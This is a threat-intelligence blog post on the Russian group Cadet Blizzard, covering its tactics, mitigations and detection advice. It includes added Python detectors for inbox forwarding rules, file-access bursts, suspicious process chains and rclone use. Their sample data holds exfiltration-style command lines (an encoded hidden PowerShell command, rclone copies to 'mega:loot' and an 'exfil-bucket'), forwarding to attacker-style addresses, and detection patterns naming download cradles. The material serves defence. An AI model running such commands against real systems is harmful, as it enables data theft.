
Cadet Blizzard Exposed: Critical Tactics Used by Russian Hackers

June 17, 2023
A new hacking group, known as Cadet Blizzard, has been linked to Russia’s military intelligence agency. Here is an overview of their activities.

by Kade Morton (CEO)

Introduction

In a recent development, Microsoft has identified a new hacking group known as Cadet Blizzard, which has been linked to Russia’s military intelligence agency. The group has been involved in cyberattacks targeting organisations across Europe, Latin America, and Central Asia. This blog post provides an overview of Cadet Blizzard’s activities and their significance in the Russian cyber threat landscape.

A New Player in the Russian Cyber Threat Landscape

Cadet Blizzard has emerged as a novel actor affiliated with Russia’s Main Directorate of the General Staff of the Armed Forces (GRU). First observed in 2020, Cadet Blizzard prioritises targeting government services, law enforcement, non-profit/non-governmental organisations, IT service providers/consulting, and emergency services in Ukraine.

Unlike established GRU-affiliated groups such as APT28 (Fancy Bear, Sofacy, Strontium, Sednit, SIG40, Group 74, PawnStorm, Snakemackerel, TG-4127, Tsar Team, Blue Athena, IRON TWILIGHT, Swallowtail, Threat Group-4127, Forest Blizzard) and Sandworm (Electrum, Telebots, BlackEnergy, Quedagh, Voodoo Bear, CTG-7263, Hades, OlympicDestroyer, IRIDIUM, TEMP.Noble, IRON VIKING, Seashell Blizzard), Cadet Blizzard operates independently, focusing on destructive cyber operations to support military objectives in Ukraine. Their actions aim to deliver impact, even at the expense of network operations and the exposure of sensitive information through targeted hack-and-leak operations.

Cadet Blizzard’s operations are centred around Ukraine but have expanded to target European and Latin American entities, seeking tactical and strategic-level insights into Western operations and policies related to the conflict. Cadet Blizzard operates throughout the week, specifically targeting off-business hours of their primary targets to reduce the likelihood of detection.

Cadet Blizzard’s Connection to WhisperGate Attacks

Microsoft has linked Cadet Blizzard to the WhisperGate data-wiping attacks on Ukrainian government organisations preceding the Russian invasion in February 2022. These cyber offensives coincided with the deployment of Russian tanks and troops along the Ukrainian borders.

WhisperGate disguised itself as ransomware but instead wiped infected devices, resembling the notorious NotPetya wiper that targeted Ukrainian businesses in 2017. The group was also involved in defacing Ukrainian websites and conducting hack-and-leak operations promoted through the ‘Free Civilian’ Telegram channel.

Renewed Targeting of Ukrainian Government Organisations

Since February 2023, Cadet Blizzard has intensified attacks on Ukrainian government organisations and IT providers. Microsoft has connected these incidents to breaches reported by Ukraine’s Computer Emergency Response Team (CERT-UA), uncovering evidence of the persistent threat posed by Russian state hackers.

Tactics, Techniques, and Procedures

Cadet Blizzard employs a range of tools, tactics, and procedures to achieve their objectives. The group frequently initiates intrusions by targeting vulnerable infrastructure via Exploit Public-Facing Application (T1190). Rather than relying solely on phishing, it actively scans for and exploits vulnerabilities in internet-exposed services to establish an initial foothold. In preparation for these intrusions, the group has been observed developing and obtaining malware (T1587.001, T1588.001) and acquiring legitimate utilities that it repurposes for malicious use (T1588.002), which it then deploys to maintain presence and prepare for lateral movement.

Once inside the network, a primary objective is privilege escalation and credential harvesting. The group specifically targets the Security Account Manager (T1003.002). The SAM database is present on every Windows host and holds the hashed credentials of local accounts; by dumping it, the group obtains password hashes that can be cracked or replayed to compromise local administrator accounts. This activity often precedes lateral movement and is a critical choke point for detection.

The group’s intelligence-gathering capabilities are focused on two main areas. First, they execute Data from Local System (T1005), searching compromised endpoints for sensitive files and directories. Second, they employ Email Collection (T1114), targeting mail repositories to extract sensitive communications. This is often facilitated by tools such as Rclone, a command-line program used to manage files on cloud storage, which the group leverages for data exfiltration.

Consistent with their mandate to disrupt and intimidate, Cadet Blizzard continues to utilise External Defacement (T1491.002). This technique involves modifying public-facing websites or messaging systems to broadcast propaganda or signal a breach, often serving as a distraction from concurrent destructive activities involving the WhisperGate wiper.

Risk and Impact

Microsoft notes that Cadet Blizzard’s attacks have a relatively lower success rate compared to other GRU-affiliated groups such as APT28 and Sandworm. While Cadet Blizzard experienced a decline in activity after June 2022, the group resurfaced in early 2023 and has achieved occasional success in their recent cyber operations. However, they have not matched the impact of their GRU counterparts’ attacks.

Cadet Blizzard’s activities, although not as successful or mature as other GRU-affiliated threat actors, demand attention due to their focus on delivering impact and their potential to gain strategic-level insights into Western operations and policies related to the conflict.

Threat-Informed Defence

To effectively counter Cadet Blizzard, organisations must move beyond generic security hygiene and implement controls that directly disrupt the group’s specific Tactics, Techniques, and Procedures (TTPs). This is known as Threat-Informed Defence (TID).

Given Cadet Blizzard’s reliance on Email Collection (T1114), organisations should prioritise the auditing of email environments. Specifically, security teams should implement Audit (M1047) mechanisms to regularly review auto-forwarding rules. In Exchange environments, administrators can use the Get-InboxRule cmdlet to discover and remove forwarding or redirect rules that the group may use to siphon data. Note that mailbox-level forwarding configured outside inbox rules (the ForwardingSmtpAddress and ForwardingAddress properties shown by Get-Mailbox) is not visible to Get-InboxRule and should be reviewed separately, as should any transport rules that relay mail to external domains.
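Reviewing rules by eye does not scale past a handful of mailboxes, so the logic an analyst applies is worth encoding. The following is an added example, not Arachne Digital’s code: it assumes inbox rules were exported with Get-InboxRule and ConvertTo-Json and then reduced so that recipient fields hold plain SMTP addresses, and it triages them for external forwarding, for rules that hide security-related mail, and for the near-empty names attackers use to keep rules inconspicuous. The internal domain, keyword list and sample rules are constructed for illustration.

```python
"""Triage exported Exchange inbox rules for forwarding and hiding behaviour.

Added example, not Arachne Digital's code. Assumes records produced by
`Get-InboxRule -Mailbox <user> | ConvertTo-Json`, reduced so that recipient
fields hold plain SMTP addresses. The sample rules below are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

INTERNAL_DOMAINS = {"corp.example"}  # assumption: the organisation's own mail domains
# Subjects an intruder typically hides from the mailbox owner while holding access
SUSPICIOUS_WORDS = {"password", "mfa", "verification", "security", "invoice", "payment"}
# Folders users rarely open; moving matching mail there is the classic "hide the trail" trick
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history", "junk email", "deleted items"}


@dataclass
class InboxRule:
    mailbox: str
    name: str
    enabled: bool = True
    forward_to: List[str] = field(default_factory=list)
    forward_as_attachment_to: List[str] = field(default_factory=list)
    redirect_to: List[str] = field(default_factory=list)
    delete_message: bool = False
    move_to_folder: Optional[str] = None
    subject_contains_words: List[str] = field(default_factory=list)


def is_external(address: str) -> bool:
    return address.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS


def triage_rule(rule: InboxRule) -> List[str]:
    """Return the reasons a rule deserves analyst attention; an empty list means benign."""
    if not rule.enabled:
        return []
    reasons = []
    targets = rule.forward_to + rule.forward_as_attachment_to + rule.redirect_to
    external = [t for t in targets if is_external(t)]
    if external:
        reasons.append("forwards or redirects to external recipient(s): " + ", ".join(external))
    words = {w.lower() for w in rule.subject_contains_words} & SUSPICIOUS_WORDS
    hides = rule.delete_message or (rule.move_to_folder or "").lower() in HIDING_FOLDERS
    if hides and words:
        reasons.append("hides messages matching " + ", ".join(sorted(words)))
    if len(rule.name.strip()) <= 1:
        reasons.append("near-empty rule name (commonly used to make an attacker's rule inconspicuous)")
    return reasons


def triage_all(rules: List[InboxRule]) -> Dict[Tuple[str, str], List[str]]:
    """Map (mailbox, rule name) -> reasons, for rules that raised at least one reason."""
    findings = {}
    for rule in rules:
        reasons = triage_rule(rule)
        if reasons:
            findings[(rule.mailbox, rule.name)] = reasons
    return findings


# Constructed sample: a benign rule, an exfiltration rule, a "hide the password reset" rule,
# and a disabled rule that should not fire.
SAMPLE_RULES = [
    InboxRule("alice@corp.example", "Move newsletters", move_to_folder="Newsletters",
              subject_contains_words=["newsletter"]),
    InboxRule("alice@corp.example", ".", forward_as_attachment_to=["drop@mail-example.net"]),
    InboxRule("bob@corp.example", "cleanup", delete_message=True,
              subject_contains_words=["Password", "MFA"]),
    InboxRule("carol@corp.example", "old rule", enabled=False,
              forward_to=["archive@attacker-example.org"]),
]

if __name__ == "__main__":
    for (mailbox, name), reasons in triage_all(SAMPLE_RULES).items():
        print(f"{mailbox} rule {name!r}: " + "; ".join(reasons))
```

Run it against a real export by building InboxRule objects from the JSON; the three checks are independent, so a rule that both forwards externally and deletes the original is reported for both.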

Furthermore, to reduce the impact if mail is exported, intercepted or forwarded, organisations should Encrypt Sensitive Information (M1041). Implementing public key cryptography for mail (for example S/MIME) ensures that even if an adversary accesses email stores, they cannot read the content without the recipient’s private key. This should be paired with Multi-factor Authentication (M1032) on all public-facing webmail servers to minimise the value of compromised usernames and passwords.

Cadet Blizzard frequently gains entry via Exploit Public-Facing Application (T1190). To mitigate this, Application Isolation and Sandboxing (M1048) is critical; this limits what system features and processes an exploited application can access, containing the breach. Additionally, deploying Web Application Firewalls (WAFs) under Exploit Protection (M1050) can limit exposure by preventing exploit traffic from ever reaching the application.

Network defenders should also Filter Network Traffic (M1037) by restricting outbound connections from public-facing servers. While this may not prevent the initial exploit, it severely hampers the attacker’s ability to establish command and control (C2) or verify their success post-compromise.

To limit the downstream value of credential access stemming from Security Account Manager (T1003.002) activity, organisations should harden authentication and account design through Operating System Configuration (M1028) and Privileged Account Management (M1026). Specifically, security teams should consider disabling or restricting NTLM authentication wherever feasible.

While this does not inherently stop an attacker from attempting to access the SAM database, it reduces the usefulness of harvested NTLM-based credentials and disrupts common follow-on abuse such as credential replay and lateral movement. Enable the audit variants of the Restrict NTLM group policies first and review the resulting events before enforcing them, because legacy applications and appliances frequently still depend on NTLM and blocking it blindly will break them. This should be paired with strict privileged account controls: enforce least privilege for service accounts, minimise local administrator membership, and implement strong local administrator password hygiene (for example, centrally managed unique local administrator passwords through Windows LAPS) so that even if credentials are exposed, the attacker’s inherited permissions and ability to move are constrained.

To reduce the impact of compromised email accounts being used to trigger high-risk actions, organisations should implement an Out-of-Band Communications Channel (M1060). Security teams should require secure out-of-band verification for critical requests initiated via email, such as password resets, financial transactions, or access approvals, so that an attacker who has gained mailbox access cannot successfully authenticate the request through email alone.

For highly sensitive matters, staff should shift the conversation to a separate trusted channel (for example, a known-good phone callback procedure, a secure internal ticketing portal, or an approved secure messaging platform) rather than relying solely on email.

Finally, Data Loss Prevention (M1057) tools should be tuned to detect and restrict access to sensitive unencrypted data residing on local systems, directly countering the group’s Data from Local System (T1005) collection techniques.

Tool-Specific Coverage

Cadet Blizzard has also been observed using specific tooling and malware, including Rclone (S1040) and WhisperGate (S0689), and defenders should ensure their security stack explicitly recognises and monitors for these artifacts. Security teams should validate that AV/EDR signatures and detection content cover these families/tools, update SIEM detection rules to look for them in the environment, and monitor network telemetry for signs of their use.

Rclone

Because Rclone is a legitimate command-line utility for syncing data to cloud storage services, its presence in production environments can enable fast, low-friction data movement and exfiltration.
Defenders should treat Rclone as high-risk dual-use tooling and restrict or tightly govern its execution on servers and user endpoints that do not have an explicit business requirement for it. In parallel, defenders should apply Filter Network Traffic (M1037) controls to constrain outbound access to unsanctioned cloud storage destinations, reducing the attacker’s ability to transfer collected data off-network even if the tool is executed.

WhisperGate

A multi-stage wiper, WhisperGate is designed to appear like ransomware. Since destructive malware is an impact event rather than simple collection, organisations should ensure they can rapidly contain suspected WhisperGate execution and recover safely. This includes ensuring endpoint security tooling can detect and block WhisperGate, and validating that backups and recovery procedures are resilient to destructive activity (e.g., offline/immutable backups and tested restoration workflows).

Detection Opportunities

To effectively identify Cadet Blizzard’s activity, Security Operations Centers (SOCs) must move beyond general alerts and tune their SIEM, EDR, and XDR platforms to detect specific, high-fidelity artifacts. The following detection logic is mapped directly to the group’s observed operational behaviours.

Endpoint and File Integrity Monitoring (FIM)

Defenders should implement strict monitoring for abnormal file access, a primary indicator of Data from Local System (T1005).

  • Configure FIM to alert on unexpected access to sensitive user files, specifically filtering for extensions such as .pdf, .docx, and .jpg, as well as local database files. Scope the detection to servers that shouldn’t browse user content (Exchange, app servers, jump hosts), or a defined crown jewels file share. Consider burst logic, such as N file reads across many directories in X minutes. Only alert when the accessor is non-standard (unsigned, temp path, new binary) or a service account that doesn’t normally do this.
  • For environments running ESXi, detection rules must be explicitly tuned to monitor the /vmfs/volumes directory. Alert on unauthorised access to .vmdk and .vmsn files, as the theft of these virtual disk and snapshot files is a documented technique for this actor. To reduce noise, allowlist known management sources (vCenter IPs, backup servers) and known processes/accounts. Alert on direct host access patterns that bypass expected management paths (e.g., interactive sessions, SSH/SCP access, unfamiliar admin accounts). Focus on unusual time, along with unusual principal and unusual source as a triple condition.
  • Monitor for unusual processes accessing local system email files, which indicates active Email Collection (T1114) attempts. Allowlist expected processes (Outlook, Exchange services, indexer, backup). Alert when access is performed by non-mail processes (web worker, script host, unknown binary) and correlates with other signals (archive creation, outbound upload).
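The burst and scoping logic in the first bullet is the part most teams get wrong, so here it is as working code. This is an added example, not Arachne Digital’s code: it assumes file-access telemetry already normalised to (timestamp, host, accessing image, signing status, path) records as an EDR or FIM agent would emit, and alerts only when a non-standard accessor on an in-scope server reads many sensitive files across many directories inside a sliding window. The host list, allowlist, thresholds and sample events are constructed for illustration.

```python
"""Burst detection for sensitive-file reads on servers that should not browse user content.

Added example, not Arachne Digital's code. Assumes normalised file-access
telemetry; hosts, allowlist, thresholds and events below are constructed.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List

SENSITIVE_EXT = {".pdf", ".docx", ".xlsx", ".jpg", ".db", ".sqlite", ".mdb"}
IN_SCOPE_HOSTS = {"EXCH01", "APP02", "JUMP01"}          # servers with no reason to read user documents
KNOWN_GOOD_IMAGES = {                                     # expected readers, lower-cased full paths
    r"c:\windows\system32\searchindexer.exe",
    r"c:\program files\backupagent\agent.exe",
}
TEMP_MARKERS = ("\\temp\\", "\\tmp\\", "\\appdata\\local\\", "\\users\\public\\")


@dataclass
class FileAccess:
    ts: float       # epoch seconds
    host: str
    image: str      # full path of the process reading the file
    signed: bool    # Authenticode signature valid according to the sensor
    path: str       # file that was read


def accessor_is_nonstandard(image: str, signed: bool) -> bool:
    """Unsigned, or running from a user-writable/temp location, and not an allowlisted reader."""
    img = image.lower()
    if img in KNOWN_GOOD_IMAGES:
        return False
    return (not signed) or any(marker in img for marker in TEMP_MARKERS)


def detect_bursts(events: List[FileAccess], min_files: int = 20, min_dirs: int = 5,
                  window_s: float = 300) -> List[Dict]:
    """Alert once per (host, image) when a non-standard accessor reads at least min_files
    sensitive files spread over at least min_dirs directories within window_s seconds."""
    windows: Dict[tuple, deque] = defaultdict(deque)
    alerted, alerts = set(), []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.host not in IN_SCOPE_HOSTS:
            continue
        if PureWindowsPath(ev.path).suffix.lower() not in SENSITIVE_EXT:
            continue
        if not accessor_is_nonstandard(ev.image, ev.signed):
            continue
        key = (ev.host, ev.image.lower())
        q = windows[key]
        q.append(ev)
        while ev.ts - q[0].ts > window_s:       # slide the window forward
            q.popleft()
        dirs = {str(PureWindowsPath(e.path).parent).lower() for e in q}
        if key not in alerted and len(q) >= min_files and len(dirs) >= min_dirs:
            alerted.add(key)
            alerts.append({"host": ev.host, "image": ev.image, "n_files": len(q),
                           "n_dirs": len(dirs), "first_ts": q[0].ts, "last_ts": ev.ts})
    return alerts


def make_sample() -> List[FileAccess]:
    """Constructed telemetry: a collector on EXCH01 (should alert), the signed indexer on
    EXCH01 (allowlisted, no alert), and the same collector on a workstation (out of scope)."""
    dirs = [r"c:\users\admin\documents", r"c:\finance\reports", r"c:\hr\records",
            r"c:\legal\contracts", r"c:\shares\projects", r"c:\backup\exports"]
    collector = r"C:\Users\Public\collect.exe"
    indexer = r"C:\Windows\System32\SearchIndexer.exe"
    events = []
    for i in range(30):
        events.append(FileAccess(1000 + 3 * i, "EXCH01", collector, False, rf"{dirs[i % 6]}\doc{i}.docx"))
        events.append(FileAccess(1000 + 3 * i, "WS01", collector, False, rf"{dirs[i % 6]}\doc{i}.pdf"))
    for i in range(40):
        events.append(FileAccess(1000 + 2 * i, "EXCH01", indexer, True, rf"{dirs[i % 6]}\idx{i}.pdf"))
    return events


if __name__ == "__main__":
    for alert in detect_bursts(make_sample()):
        print(alert)
```

The alert fires the moment both thresholds are crossed and then stays quiet for that host/process pair, which keeps one collection run from producing hundreds of tickets; tune min_files and min_dirs per server role rather than globally.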

Process and API Telemetry

Cadet Blizzard’s reconnaissance often generates distinct process patterns that can be caught before exfiltration occurs.

  • Tune EDR sensors to flag specific OS API Execution calls that search local file systems or enumerate directories. This behavior often precedes the staging of data. To reduce noise, only trigger when the process is new/rare on that host, from temp/user-writable paths, unsigned, or spawned by a high-risk parent (web server worker, office app, script host). Add volume and breadth thresholds, such as many directories, many file types, many shares.
  • Alert on newly executed processes that exhibit search and find behaviors against local databases or file shares. If a process that typically does not access these resources suddenly begins traversing the file system, it should be investigated. To tighten the scope, look to servers where file browsing is atypical (DMZ apps, Exchange, MFT appliances). You can also add parent process constraints (e.g., w3wp.exe, then cmd.exe/powershell.exe, then findstr/robocopy/7z/rclone), and add time correlation with staging/exfiltration indicators (for example, an archive being created shortly before an outbound spike).
  • Heightened scrutiny should be applied to Script Execution, often used to automate the collection and compression of data. Specify which script engines and which suspicious patterns should be alerted on, such as PowerShell with -enc, -nop or IEX, download-cradle patterns, or scripts that write archives, enumerate mailboxes/shares, or launch rclone, curl, or bitsadmin. Scope the detection to unexpected hosts (DMZ servers, Exchange, MFT) and unexpected accounts (such as service accounts or newly privileged accounts).
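The parent-chain constraint and the PowerShell flag patterns from the bullets above can be combined into one scoring rule. The following is an added example, not Arachne Digital’s code: it assumes Sysmon-style process-creation records (process id, parent id, image path, command line) from a single host, walks each process’s ancestry to look for a high-risk parent such as w3wp.exe, and only alerts when a collection tool or a script host with suspicious flags sits under one, or when several suspicious flags appear together. The parent and tool lists, regexes and sample events are constructed for illustration.

```python
"""Score process-creation events by ancestry and command line.

Added example, not Arachne Digital's code. Assumes Sysmon-style process
creation records from one host; names, patterns and samples are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

HIGH_RISK_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe", "outlook.exe",
                     "wscript.exe", "cscript.exe", "mshta.exe"}
COLLECTION_TOOLS = {"findstr.exe", "robocopy.exe", "7z.exe", "7za.exe",
                    "rclone.exe", "curl.exe", "bitsadmin.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_PS = [
    (re.compile(r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\b"), "encoded command"),
    (re.compile(r"(?i)(^|\s)-nop(rofile)?\b"), "profile bypass"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "IEX"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|(^|\s)iwr\b|net\.webclient"),
     "download cradle"),
    (re.compile(r"(?i)compress-archive|get-mailbox|get-childitem\s+-recurse"), "collection/archiving"),
]


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(procs: Dict[int, Proc], pid: int, max_depth: int = 8) -> List[str]:
    """[self, parent, grandparent, ...] as lower-cased image names; stops at unknown or looping pids."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(basename(procs[pid].image))
        pid = procs[pid].ppid
    return chain


def evaluate(procs: Dict[int, Proc]) -> List[Dict]:
    alerts = []
    for p in procs.values():
        chain = ancestry(procs, p.pid)
        me, ancestors = chain[0], chain[1:]
        risky_parent = next((a for a in ancestors if a in HIGH_RISK_PARENTS), None)
        reasons = []
        if me in SCRIPT_HOSTS:
            reasons += [label for rx, label in SUSPICIOUS_PS if rx.search(p.cmdline)]
        if me in COLLECTION_TOOLS and risky_parent:
            reasons.append(f"collection tool spawned under {risky_parent}")
        elif reasons and risky_parent:
            reasons.append(f"script host spawned under {risky_parent}")
        # Scope: a risky ancestor, or several suspicious flags at once; a single flag alone is too noisy
        if reasons and (risky_parent or len(reasons) >= 2):
            alerts.append({"pid": p.pid, "image": me, "chain": " <- ".join(chain), "reasons": reasons})
    return alerts


def sample_procs() -> Dict[int, Proc]:
    """Constructed events: a web-shell chain under IIS, and routine admin activity under explorer."""
    procs = [
        Proc(4, 1, r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap DefaultAppPool"),
        Proc(10, 4, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
        Proc(11, 10, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             "powershell.exe -nop -w hidden -enc SQBFAFgA"),
        Proc(12, 10, r"C:\Users\Public\rclone.exe", r"rclone.exe copy C:\staging mega:loot"),
        Proc(20, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
        Proc(21, 20, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             r"powershell.exe -File C:\scripts\rotate-logs.ps1"),
        Proc(22, 20, r"C:\Windows\System32\Robocopy.exe", r"robocopy.exe D:\data E:\mirror /MIR"),
    ]
    return {p.pid: p for p in procs}


if __name__ == "__main__":
    for alert in evaluate(sample_procs()):
        print(alert)
```

Robocopy under an administrator’s explorer session is deliberately left alone; the same binary two levels under w3wp.exe is what the rule is for.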

Network Traffic Analysis

Network artifacts provide the strongest signal for Email Collection (T1114) and C2 activity.

  • Configure network monitoring to flag newly constructed connections sending or receiving data from untrusted hosts. This is particularly relevant for identifying exfiltration channels. Define what is untrusted for your organisation, such as not in allowlist, new ASN/geography, low reputation, or newly registered domain. Add byte thresholds (high outbound bytes, sustained sessions, repeated retries), and scope to public-facing servers that should have tight egress, or to specific protocols that matter (such as rare outbound from Exchange/MFT).
  • Investigate processes connecting to email servers that do not ostensibly have a business need to do so. Any deviation from standard traffic patterns, such as a non-mail client process connecting to an SMTP or IMAP port, should be treated as suspicious. To scope the detection, separate internal vs external SMTP/IMAP. Non-mail processes talking to external mail services is far higher signal. Use an allowlist of legitimate mail-capable processes and alert on everything else. Add context such as authorisation (failed logons, unusual auth mechanism) and time correlation (such as recent rule creation, mailbox export, or outbound spike).

Identity and Access Monitoring

Credential abuse is a core facilitator of Cadet Blizzard’s lateral movement.

  • Monitor Logon Session Creation for unusual activity patterns. Specifically, look for logins from unknown or abnormal geographic locations involving high-value accounts, such as Exchange Administrators. An anomalous login here often signals the start of an email collection campaign, but VPNs, travel, mobile devices, and cloud auth patterns create lots of unexpected geography false positives. Refine the detection by using identity risk signals (such as a new device, unfamiliar IP, or an atypical user agent). Baseline on known VPN egress ranges and expected admin jump hosts and correlate with high-impact actions (such as mailbox rule creation, privilege changes, new OAuth app consent, or export activity).

Web and Application Defence

To counter External Defacement (T1491.002), detection must extend to public-facing assets.

  • Deploy monitors for unplanned content changes on external websites. This includes tracking File Creation or File Modification events that overwrite index.html or other core web files. Integrate this detection with deployment/change windows and suppress alerts during planned releases. Alert only when changes are made outside the CI/CD process or by unexpected accounts. Focus on web-root writes with a suspicious parent process (such as a web worker spawning a shell) or edits originating from an unknown IP.

Rclone

  • Alert on the execution of rclone.exe (Windows) or rclone (Linux/macOS), especially on servers where it is not standard.
  • Flag suspicious command patterns such as bulk sync/copy operations, use of newly created “remote” destinations, or references to external cloud storage targets (e.g., MEGA/Drive/S3-style remotes).
  • Trigger on unusual outbound upload volume from systems running Rclone, or on new outbound connections to cloud storage services that are not part of approved business workflows.
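The three Rclone bullets are easiest to apply as a single command-line classifier. The following is an added example, not Arachne Digital’s code: it assumes process-creation telemetry with host name and full command line, recognises rclone’s bulk subcommands and remote arguments (including the colon-prefixed on-the-fly backends that never touch rclone.conf), and suppresses the case of an approved host talking to a sanctioned remote. The approved hosts, sanctioned remote names, backend hints and sample command lines are constructed for illustration.

```python
"""Classify rclone invocations from process command lines.

Added example, not Arachne Digital's code. Assumes process-creation telemetry
with host and full command line; hosts, remotes and samples are constructed.
"""
import re
import shlex
from typing import Dict, List, Optional

APPROVED_HOSTS = {"BACKUP01"}                 # assumption: hosts where rclone has a business purpose
SANCTIONED_REMOTES = {"s3backup"}             # assumption: configured remote names that are approved
CLOUD_HINTS = ("mega", "s3", "drive", "dropbox", "onedrive", "b2", "box", "pcloud", "sftp", "ftp")
BULK_COMMANDS = {"copy", "sync", "move", "copyto", "moveto"}
REMOTE_RE = re.compile(r"^(?P<name>:?[A-Za-z0-9_\-]*):(?P<rest>.*)$")
PUBLIC_PATH_MARKERS = ("\\users\\public\\", "\\temp\\", "\\programdata\\", "/tmp/")


def split_cmdline(cmdline: str) -> List[str]:
    # posix=False keeps Windows backslashes intact; surrounding quotes are stripped by hand
    return [a.strip('"') for a in shlex.split(cmdline, posix=False)]


def remote_name(arg: str) -> Optional[str]:
    """rclone remote in an argument like mega:loot or :s3:bucket, else None.
    A single letter before the colon (C:\\staging) is a Windows drive, not a remote."""
    m = REMOTE_RE.match(arg)
    if not m:
        return None
    name = m.group("name")
    if not name.startswith(":") and len(name) == 1:
        return None
    return name.lower()


def classify_rclone(host: str, cmdline: str) -> Optional[Dict]:
    """None when the event is not rclone or is approved; otherwise severity plus reasons."""
    argv = split_cmdline(cmdline)
    if not argv or argv[0].replace("/", "\\").rsplit("\\", 1)[-1].lower() not in {"rclone", "rclone.exe"}:
        return None
    args = argv[1:]
    positional = [a for a in args if not a.startswith("-")]
    subcommand = positional[0] if positional else None
    remotes = [r for r in (remote_name(a) for a in positional) if r]
    if host in APPROVED_HOSTS and all(r in SANCTIONED_REMOTES for r in remotes):
        return None                                   # approved host, approved remotes: business as usual
    reasons = []
    if host not in APPROVED_HOSTS:
        reasons.append(f"rclone executed on unapproved host {host}")
    if subcommand in BULK_COMMANDS:
        reasons.append(f"bulk '{subcommand}' operation")
    for r in remotes:
        backend = r.lstrip(":")
        if r.startswith(":"):
            reasons.append(f"on-the-fly backend '{backend}' (no saved remote, nothing to audit in rclone.conf)")
        elif r not in SANCTIONED_REMOTES:
            reasons.append(f"unsanctioned remote '{r}'")
        if any(h in backend for h in CLOUD_HINTS):
            reasons.append(f"remote name suggests external cloud storage ({backend})")
    for i, a in enumerate(args):
        low = a.lower()
        if not low.startswith("--"):
            continue
        flag, _, value = low.partition("=")
        if not value and i + 1 < len(args):
            value = args[i + 1].lower()                # "--config <path>" form
        if any(flag.startswith(f"--{h}-") for h in CLOUD_HINTS):
            reasons.append(f"backend setting passed on the command line: {flag}")
        if flag == "--config" and any(m in value for m in PUBLIC_PATH_MARKERS):
            reasons.append("config file in a user-writable location")
    severity = "high" if remotes and host not in APPROVED_HOSTS else "medium"
    return {"host": host, "severity": severity, "subcommand": subcommand,
            "remotes": remotes, "reasons": reasons}


# Constructed sample events: (host, command line)
SAMPLE_EVENTS = [
    ("EXCH01", r'"C:\Users\Public\rclone.exe" copy C:\staging mega:loot --transfers 32 --config C:\Users\Public\rc.conf'),
    ("BACKUP01", r"rclone.exe sync D:\backups s3backup:corp-backups --transfers 8"),
    ("WEB01", r"rclone.exe copy C:\inetpub\dumps :s3:exfil-bucket --s3-access-key-id AKIAEXAMPLE"
              r" --s3-secret-access-key secret --s3-region us-east-1"),
    ("WEB01", r"notepad.exe C:\notes.txt"),
]

if __name__ == "__main__":
    for host, cmdline in SAMPLE_EVENTS:
        print(host, classify_rclone(host, cmdline))
```

The subcommand is taken as the first positional argument, which is how rclone is normally invoked; if your telemetry shows flags with separate values placed before the subcommand, parse those flags first. The on-the-fly backend case matters because an attacker who passes credentials as --s3-… flags leaves no remote definition on disk for a post-incident review to find.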

WhisperGate

  • Treat any WhisperGate-related alert from EDR/AV as a high-severity incident requiring immediate containment and scoping, given its wiper functionality.
  • Alert on abnormal spikes in file modification/destructive write patterns across endpoints and servers that may indicate wiping behaviour (impact-focused monitoring aligned with data destruction).
  • If your environment supports it, correlate destructive activity signals with unusual lateral execution or administrative tooling patterns to identify whether the wiper is being deployed broadly rather than acting as an isolated infection.

Ready to Turn Intelligence into Action?

Don’t just read about Cadet Blizzard, operationalise this intelligence today.

Arachne Digital helps organisations move from reactive patching to proactive Threat-Informed Defence:

  • Get the full structured dataset behind this report, including complete IoCs and TTP mappings, via our API.
  • Use Thread, our open-source tool, to map your own internal reports to MITRE ATT&CK and identify your specific coverage gaps.
  • Reach out to the Threat-Informed Defence Alliance to design a bespoke defence program that prioritises the threats targeting your specific industry and region.

Start building a smarter defence today. Contact Arachne Digital to get started.

Defending Against Cadet Blizzard

The evolution of Cadet Blizzard marks a critical shift in the Russian cyber threat landscape. Merely staying alert is no longer sufficient. To truly counter Cadet Blizzard, organisations must adopt a threat-informed defence strategy that maps directly to Cadet Blizzard’s specific behaviours. This means moving past generic hygiene and implementing targeted controls, such as auditing email forwarding rules to stop Cadet Blizzard’s collection efforts, restricting NTLM to limit their credential theft, and aggressively monitoring for the specific file and network artifacts Cadet Blizzard leaves behind.

By understanding how Cadet Blizzard operates, down to the specific API calls and file extensions they target, defenders can turn the tables. Implementing these precise, intelligence-driven mitigations is the only way to effectively neutralise the risk posed by Cadet Blizzard and safeguard regional security against this evolving adversary.

© 2025 Arachne Digital, ALL RIGHTS RESERVED